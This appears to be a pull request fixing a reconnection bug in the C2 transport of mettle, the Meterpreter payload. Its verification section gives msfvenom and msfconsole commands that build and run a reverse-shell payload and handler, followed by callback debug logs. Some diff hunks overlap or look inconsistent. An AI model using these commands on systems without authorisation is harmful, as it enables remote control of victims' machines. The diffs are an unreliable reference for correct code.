### PR TITLE
fix rapid7/metasploit-framework#12841

### DIFF
--- a/mettle/src/buffer_queue.c
+++ b/mettle/src/buffer_queue.c
@@ -114,7 +114,6 @@ size_t buffer_queue_copy(struct buffer_queue *q, void *data, size_t len)
 		memcpy(data, buf->data + buf->offset, bytes);
 		data += bytes;
 		len -= bytes;
-		buf = buf->next;
 		copied += bytes;
 		if (len <= 0) {
 			break;

--- a/mettle/src/c2_tcp.c
+++ b/mettle/src/c2_tcp.c
@@ -35,13 +35,11 @@ static void tcp_event_cb(struct bufferev *be, int event, void *arg)
 {
 	struct c2_transport *t = arg;
 	if (event & BEV_CONNECTED) {
-		c2_transport_reachable(t);
-	} else if (event == BEV_ERROR) {
-		c2_transport_unreachable(t);
 		struct tcp_ctx *ctx = c2_transport_get_ctx(t);
 		if (ctx) {
 			ctx->first_packet = 1;
 		}
+		c2_transport_reachable(t);
 	} else {
 		c2_transport_unreachable(t);
 	}

--- a/mettle/src/c2_tcp.c
+++ b/mettle/src/c2_tcp.c
@@ -36,6 +36,12 @@ static void tcp_event_cb(struct bufferev *be, int event, void *arg)
 	struct c2_transport *t = arg;
 	if (event & BEV_CONNECTED) {
 		c2_transport_reachable(t);
+	} else if (event == BEV_ERROR) {
+		c2_transport_unreachable(t);
+		struct tcp_ctx *ctx = c2_transport_get_ctx(t);
+		if (ctx) {
+			ctx->first_packet = 1;
+		}
 	} else {
 		c2_transport_unreachable(t);
 	}


### PR DESCRIPTION
First attempt at fixing https://github.com/rapid7/metasploit-framework/issues/12841
The issue is intermittent on linux/x64/meterpreter/reverse_tcp (it sometimes doesn't occur the first time, but always the 2nd).
It looks like first_packet is never set back to 1, so the tcp_read_cb (https://github.com/rapid7/mettle/blob/master/mettle/src/c2_tcp.c#L19) doesn't properly discard the stage on reconnection.
This fix simply resets first_packet to 1 on a fresh tcp connection.

## Verification

```
# Create a payload and run it:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -f elf -o met && ./met
# Create a handler and start it
msfconsole -qx "use exploit/multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; set MeterpreterDebugLevel 3; run -j"
# Wait for the session to stage, then kill the handler without exiting the session
msf5 exploit(multi/handler) > exit -y
# Create another handler to handle the reconnection
msfconsole -qx "use exploit/multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; set MeterpreterDebugLevel 3; run -j"
```

## Notes

One interesting thing I'm seeing is sometimes I get two session (attempts) at the same time e.g:
```
msf5 exploit(multi/handler) >
[*] Sending stage (3017188 bytes) to 192.168.13.37
[*] Meterpreter session 1 opened (192.168.13.37:4444 -> 192.168.13.37:59628) at 2020-03-11 15:00:58 +0800
[*] Sending stage (3017188 bytes) to 192.168.13.37
[*] Meterpreter session 2 opened (192.168.13.37:4444 -> 192.168.13.37:59632) at 2020-03-11 15:00:59 +0800
```

meanwhile it looks like it's attempting to connect twice:
```
[03-11-2020 15:18:41.288s] [mettle.c:75] Heartbeat
[03-11-2020 15:18:42.288s] [network_client.c:467] resolving '(null)'
[03-11-2020 15:18:42.288s] [network_client.c:467] resolving 'tcp://192.168.13.37:4444'
[03-11-2020 15:18:42.288s] [network_client.c:345] connecting to tcp://192.168.13.37:4444
[03-11-2020 15:18:42.288s] [network_client.c:345] connecting to tcp://192.168.13.37:4444
[03-11-2020 15:18:42.289s] [network_client.c:293] failed to connect to '(null)'
[03-11-2020 15:18:42.289s] [network_client.c:293] failed to connect to 'tcp://192.168.13.37:4444'
[03-11-2020 15:18:44.288s] [network_client.c:467] resolving '(null)'
[03-11-2020 15:18:44.289s] [network_client.c:345] connecting to tcp://192.168.13.37:4444
[03-11-2020 15:18:44.289s] [network_client.c:293] failed to connect to '(null)'
[03-11-2020 15:18:46.288s] [mettle.c:75] Heartbeat
[03-11-2020 15:18:46.288s] [network_client.c:467] resolving 'tcp://192.168.13.37:4444'
[03-11-2020 15:18:46.289s] [network_client.c:345] connecting to tcp://192.168.13.37:4444
[03-11-2020 15:18:46.289s] [network_client.c:293] failed to connect to 'tcp://192.168.13.37:4444'
[03-11-2020 15:18:48.288s] [network_client.c:467] resolving '(null)'
[03-11-2020 15:18:48.288s] [network_client.c:345] connecting to tcp://192.168.13.37:4444
[03-11-2020 15:18:48.288s] [network_client.c:293] failed to connect to '(null)'
[03-11-2020 15:18:50.288s] [network_client.c:467] resolving 'tcp://192.168.13.37:4444'
[03-11-2020 15:18:50.288s] [network_client.c:345] connecting to tcp://192.168.13.37:4444
[03-11-2020 15:18:50.289s] [network_client.c:293] failed to connect to 'tcp://192.168.13.37:4444'
[03-11-2020 15:18:51.288s] [mettle.c:75] Heartbeat
[03-11-2020 15:18:52.288s] [network_client.c:467] resolving '(null)'
[03-11-2020 15:18:52.288s] [network_client.c:345] connecting to tcp://192.168.13.37:4444
[03-11-2020 15:18:52.289s] [network_client.c:293] failed to connect to '(null)'
[03-11-2020 15:18:54.288s] [network_client.c:467] resolving 'tcp://192.168.13.37:4444'
[03-11-2020 15:18:54.288s] [network_client.c:345] connecting to tcp://192.168.13.37:4444
[03-11-2020 15:18:54.288s] [network_client.c:293] failed to connect to 'tcp://192.168.13.37:4444'
```
Perhaps to both the fd_transport and tcp_transport? It's unclear if this is related or working as expected.